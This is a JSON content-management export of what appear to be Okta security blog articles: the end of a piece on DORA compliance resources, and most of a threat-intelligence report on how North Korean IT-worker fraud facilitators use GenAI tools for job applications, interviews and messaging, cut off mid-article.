follow stringent guidelines for safeguarding against ICT-related incidents. These include measures for protection, detection, containment, recovery, and repair. 
DORA explicitly targets ICT risks, introducing clear rules for ICT risk management, incident reporting, operational resilience testing, and oversight of ICT third-party risks.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"How does Okta support regulated customers?\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta is committed to supporting our regulated customers in adhering to DORA regulatory compliance. To guide our customers in adhering to DORA requirements with Okta, we’ve recently released a helpful resource: the new \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://security.asqula.com/?itemUid=72d0d5d6-8cc8-4333-91d4-743159aba9f4&source=click\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"DORA Compliance with Okta\",\"marks\":[{\"type\":\"underline\"},{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" \",\"marks\":[{\"type\":\"underline\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Factsheet\",\"marks\":[{\"type\":\"underline\"},{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This factsheet provides valuable information that regulated customers can reference in their compliance efforts, including:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"An Introduction to the Key DORA Domains\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This section provides an overview of the five key DORA domains and a high-level view of how Okta’s controls, 
processes, and supporting documentation can help regulated customers achieve domain requirements. Customers can reference this to review Okta’s compliance information in alignment with the DORA requirements.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"How can Okta help?\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This section highlights some of the many Okta features that are critical components of a highly available, resilient and secure identity platform. Customers can reference the information and links within this section to perform a thorough assessment of Okta’s security posture as it applies to their own DORA regulatory requirements. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Detailed DORA Article mapping \",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Lastly, this section proactively maps the DORA domains and applicable DORA Articles with corresponding Okta Control Library Supporting Information for easy reference. 
Okta’s Control Library supports customers with a comprehensive collection of security controls adopted by our organization to protect systems and data.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"More on Compliance\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"As highlighted in our DORA Compliance with Okta Factsheet, Okta upholds a strong compliance framework to demonstrate our commitment to maintaining highly available, secure and resilient products and services - many of the DORA requirements are business as usual.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"A key component of our methodical customer support is making the information they require readily available. We publish our latest independent audit reports and other related documents on the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://security.asqula.com/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Security Trust Center\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". 
\",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"For more information on accessing Okta's Security Trust Center, visit our \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://support.asqula.com/help/s/article/accessing-okta-s-security-trust-center?language=en_US\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Docs\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://security.asqula.com/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Security Trust Center\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" and all available documentation is accessible to customers and prospects of Okta. Site visitors can view Okta’s certifications and access industry-standard questionnaires. To learn more about our efforts, read our blog article, \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.asqula.com/articles/2025/03/empowering-security-with-customer-trust-solutions/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Empowering Security with Customer Trust Solutions\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".  Keep watching as we publish additional helpful resources; more to come.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\\n\",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Disclaimer: \",\"marks\":[{\"type\":\"italic\"},{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"While this article discusses certain legal concepts, it does not constitute legal advice. It is provided for informational purposes only. 
For legal advice regarding your organization's compliance needs, please consult your organization's legal department. Okta makes no representations, warranties, or other assurances regarding the content of this article. Information regarding Okta's contractual assurances to its customers can be found at \",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"http://asqula.com/agreements\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"asqula.com/agreements\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]}]}"}},{"updatedAt":"2025-07-31T03:58:06.450Z","slug":"/articles/2025/04/GenAIDPRK","node_locale":"en","date":"2025-04-24T22:00","secAuthor":[{"name":"Okta Threat Intelligence","slug":"/hackers/oti","jobTitle":null,"id":"203ea27a-a295-5ec0-a53e-0ebe54e65cb9","bio":{"bio":"<p> </p>"},"image":{"gatsbyImageData":{"images":{"sources":[{"srcSet":"https://images.ctfassets.net/kbkgmx9upatd/2mSwf13fQ5aH31DZNddqtd/0855adabe0c07ddc9ceaa460ebd1d935/Okta_Aura_CMYK_Black.jpg?w=15&h=15&q=50&fm=webp 15w,\nhttps://images.ctfassets.net/kbkgmx9upatd/2mSwf13fQ5aH31DZNddqtd/0855adabe0c07ddc9ceaa460ebd1d935/Okta_Aura_CMYK_Black.jpg?w=29&h=29&q=50&fm=webp 29w,\nhttps://images.ctfassets.net/kbkgmx9upatd/2mSwf13fQ5aH31DZNddqtd/0855adabe0c07ddc9ceaa460ebd1d935/Okta_Aura_CMYK_Black.jpg?w=58&h=58&q=50&fm=webp 58w,\nhttps://images.ctfassets.net/kbkgmx9upatd/2mSwf13fQ5aH31DZNddqtd/0855adabe0c07ddc9ceaa460ebd1d935/Okta_Aura_CMYK_Black.jpg?w=116&h=116&q=50&fm=webp 116w","sizes":"(min-width: 58px) 58px, 100vw","type":"image/webp"}],"fallback":{"src":"https://images.ctfassets.net/kbkgmx9upatd/2mSwf13fQ5aH31DZNddqtd/0855adabe0c07ddc9ceaa460ebd1d935/Okta_Aura_CMYK_Black.jpg?w=58&h=58&fl=progressive&q=50&fm=jpg","srcSet":"https://images.ctfassets.net/kbkgmx9upatd/2mSwf13fQ5aH31DZNddqtd/0855adabe0c07ddc9ceaa460ebd1d935/Okta_Aura_CMYK_Black.jpg?w=15&h=15&fl=progressive&q=50&fm=jpg 
15w,\nhttps://images.ctfassets.net/kbkgmx9upatd/2mSwf13fQ5aH31DZNddqtd/0855adabe0c07ddc9ceaa460ebd1d935/Okta_Aura_CMYK_Black.jpg?w=29&h=29&fl=progressive&q=50&fm=jpg 29w,\nhttps://images.ctfassets.net/kbkgmx9upatd/2mSwf13fQ5aH31DZNddqtd/0855adabe0c07ddc9ceaa460ebd1d935/Okta_Aura_CMYK_Black.jpg?w=58&h=58&fl=progressive&q=50&fm=jpg 58w,\nhttps://images.ctfassets.net/kbkgmx9upatd/2mSwf13fQ5aH31DZNddqtd/0855adabe0c07ddc9ceaa460ebd1d935/Okta_Aura_CMYK_Black.jpg?w=116&h=116&fl=progressive&q=50&fm=jpg 116w","sizes":"(min-width: 58px) 58px, 100vw"}},"layout":"constrained","backgroundColor":"#f8f8f8","width":58,"height":58}}}],"title":"How AI services power the DPRK’s IT contracting scams ","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"summary":{"summary":"Nobody does GenAI quite like a fake IT worker."},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Over the past few months, Okta Threat Intelligence conducted in-depth research into online services used by individuals identified by US authorities and trusted third parties as agents for the Democratic People’s Republic of Korea (DPRK).\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Our research finds that generative artificial intelligence (GenAI) is playing an integral role in how North Korean nationals gain employment in remote technical roles around the globe, in what some researchers refer to  as “DPRK IT Workers” or “Wagemole” campaigns.  \\n\\nGenAI is used to create compelling personas at numerous stages of the job application and interview process. 
Once employed, GenAI tools are also used to assist in maintaining multiple simultaneous roles to earn revenue for the state.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Threat Intelligence has observed multiple AI-enhanced services used to:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Manage the communications of multiple personas and their numerous mobile phone accounts, instant messaging accounts, email accounts and other related chat services behind a “single pane of glass”\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Translate, transcribe and summarize communications\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Generate and critique CVs and cover letters \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Conduct mock job interviews via chat and webcam\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Test and improve the likelihood of any given job application passing automated checks\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Threat Intelligence has also observed facilitator use of online shipping and logistics services. 
We hypothesise that these services are used to redirect company-issued devices to “laptop farms” operated by facilitators based in Western countries.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Background\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Multiple \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.justice.gov/archives/opa/pr/fourteen-north-korean-nationals-indicted-carrying-out-multi-year-fraudulent-information\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"arrests and indictments\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" have revealed the scale at which individuals operating on behalf of the DPRK have been mobilized into neighbouring countries to gain fraudulent employment in organizations across the globe.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The primary objective of these schemes is to raise funds for the DPRK and compensate for the significant financial sanctions applied to the North Korean regime. US agencies have also identified several outlier cases in which the access to systems provided for employment was used to facilitate espionage or data extortion.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The targets for these fraudulent schemes appear opportunistic and based on the availability of remote technical roles. The employers most at-risk are technology companies that are more likely to accept remote candidates for IT or software engineering roles, often on a contingent basis. However, these campaigns also extend to industry verticals well beyond the technology sector. 
\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Threat Intelligence has worked with highly targeted customers and partners, with a view to developing preventative controls for this unique threat model. In the process, Okta has revised our own onboarding processes, shared awareness collateral and built out numerous methods of detection. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The research had a direct influence on \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.asqula.com/oie/en-us/content/topics/security/idp-idv.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"feature enhancements\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" built into Okta Workforce Identity, such as ID verification services, that Okta customers can use to reduce their exposure to this threat. 
\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The Facilitators\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Our understanding of this threat is shaped by the unique insight Okta Threat Intelligence can glean into the tools used by those individuals identified as “facilitators” of fraudulent employment schemes.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"These facilitators provide the necessary in-country support, technical infrastructure and/or legitimate business cover to help individuals from sanctioned countries gain and maintain employment.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Facilitators already apprehended by law enforcement in the United States are alleged to have knowingly provided a range of support services to DPRK nationals:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Direct assistance in the recruitment process\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"A domestic address for the shipment of company-issued devices\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Access to legitimate identity documents\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Operating company-issued devices on the remote worker’s 
behalf\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Installing remote management and monitoring (RMM) tools on the device to facilitate the remote work\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Authenticating, where necessary, on the remote worker’s behalf\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"One Arizona-based \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.justice.gov/usao-dc/pr/charges-and-seizures-brought-fraud-scheme-aimed-denying-revenue-workers-associated-north\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"“laptop farm” operation\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" exposed in May 2024 is alleged to have assisted in the placement of over 300 individuals in technical positions across the United States. 
In another \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.justice.gov/opa/pr/two-north-korean-nationals-and-three-facilitators-indicted-multi-year-fraudulent-remote\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"January 2025 indictment\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", two US residents were accused of fraudulently obtaining employment and operating a laptop farm in North Carolina for DPRK nationals, after they’d successfully gained employment at 64 organizations.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta can now reveal for the first time the degree to which facilitators of fraudulent work schemes rely on emerging GenAI-enhanced services to scale their operations. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta customers can read a comprehensive report into DPRK IT Worker fraud at the Okta Security Trust Center.\\nPrimary Security Contacts can sign in to access threat advisories at \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://security.asqula.com/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"security.asqula.com\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" \",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"AI-enhanced tools\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In recent months, individuals strongly suspected to be DPRK-created personas 
\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://blog.vidocsecurity.com/blog/deepfake-fraud-2/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"have been recorded\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" using real-time “deepfake” video during interviews.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Threat Intelligence research has observed a far broader set of GenAI services used in these schemes, suggesting a very deliberate attempt by facilitators to keep pace with AI innovation. Facilitators are now using GenAI-based tools to optimize every step in the process of applying and interviewing for roles and to aid DPRK nationals attempting to maintain this employment.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Facilitators were observed using GenAI-based services specializing in:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Unified messaging\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Recruitment platforms\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Resume/CV screening\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Candidate 
management\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Automated job screening\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"AI-based chatbots\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"AI code training\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Online shipping\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"While Okta Threat Intelligence is not able to observe the facilitators’ activities beyond the login page, the narrow range of functionality offered by many of these tools allows us to hypothesize on some likely use cases:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"1. Unified messaging\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"One of the most demanding challenges for facilitators is how to manage multi-channel communications on behalf of dozens of candidates from sanctioned countries and their multiple personas.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Threat Intelligence observed the use of unified messaging services to manage many simultaneous mobile phone accounts, instant messaging accounts, email accounts and other related chat services behind a “single pane of glass”. 
These GenAI-enhanced services are required to manage the scheduling of job interviews with multiple DPRK candidate personas by a small cadre of facilitators.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"These services use GenAI in everything from tools that transcribe or summarize conversations, to real-time translation of voice and text.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"2. Recruitment platforms\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Facilitators and candidates both make extensive use of jobseeking platforms to apply for roles.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"More surprising was the use of AI-enhanced recruitment platforms typically used by recruiters (not candidates) to amplify the reach and accuracy of job postings.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Access to these tools provides facilitators opportunities to advertise roles at front companies that are similar, if not identical, to those advertised by targeted organizations, in order to study the cover letters and resumes of legitimate candidates.  The CVs and cover letters from legitimate jobseekers may even form part of a training set for optimizing future applications made on behalf of DPRK nationals. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"These same recruitment platforms provide access to the same applicant vetting systems (ATS) real employers use to narrow down the number of job applications a recruiter or hiring manager needs to manually review. 
Posting fake job advertisements would allow facilitators to examine what features presented in a job application are most likely to result in these AI-enhanced algorithms selecting a particular candidate over others. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"At scale, these techniques dramatically improve the potential success of job applications, effectively using recruiters’ own tools against them.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"3. Resume/CV screening\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Threat Intelligence assesses that facilitators are highly motivated to generate successful cover letters, CVs and interviews and to address any specific criteria in a given application. \\n\\nFacilitators were observed making use of services that provide “AI Superpowers” to job applicants to help them “outsmart employers’ robots”, in order to improve the chances of a job application successfully progressing past the automated CV/resume scans used in recruiting platforms.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"These services use GenAI agents to test uploaded CVs against ATS (applicant tracking software), iterating until they achieve a better result and learning which personas will be more successful in any given role. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"4. 
Candidate management\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Threat Intelligence observed services that use GenAI agents to automate the process of filling in application forms on behalf of candidates and to track the progress of candidates through the application process. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Again, these capabilities address the challenge of facilitating job applications and employment on behalf of multiple individuals and their multiple personas across multiple time zones.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"5. Mock interviews\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Once an application is successful, the next task for facilitators is to prepare their candidates (or the facilitators themselves, in some cases) for job interviews.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Facilitators were observed using AI-enhanced services that deploy GenAI agents to host and record first-round interviews on behalf of employers, then critique and offer improvement tips for the interviewee. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"These automated “AI-based webcam interview review” services claim to assist with the appropriate use of lighting, video filters and the candidate’s approach to conversation. 
\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Threat Intelligence assesses that mock interviews staged by AI agents can be used to evaluate the efficacy of deepfake overlays and of highly scripted answers to common questions, to decrease the chance of their ruse being discovered.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"6. LLM-based chatbots\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"While most of the GenAI applications used by facilitators relate directly to training and recruitment, Okta Threat Intelligence also observed them constantly signing into generic chatbots powered by large language models (LLMs).\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Analyzing patterns of activity, these GenAI tools appear to be relied on heavily throughout the recruitment process, as well as by successful candidates once they gain employment.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"7. Code training services\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Candidates were also observed signing into free services that offer training in specific development languages and AI tools. 
These training platforms deliver a cursory awareness of unfamiliar development skills required by a hiring organization at interview, and the bare essentials required to maintain employment for as long as possible.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In short, DPRK facilitators are AI’s “power users”\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"By extensively employing AI-enhanced tools, facilitators enable minimally skilled, non-native English-speaking workers to maintain software engineering positions long enough to channel earnings towards the sanctioned DPRK regime. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The scale of observed operations suggests that even short-term employment for a few weeks or months at a time can, when scaled with automation and GenAI, present a viable economic opportunity for the DPRK. 
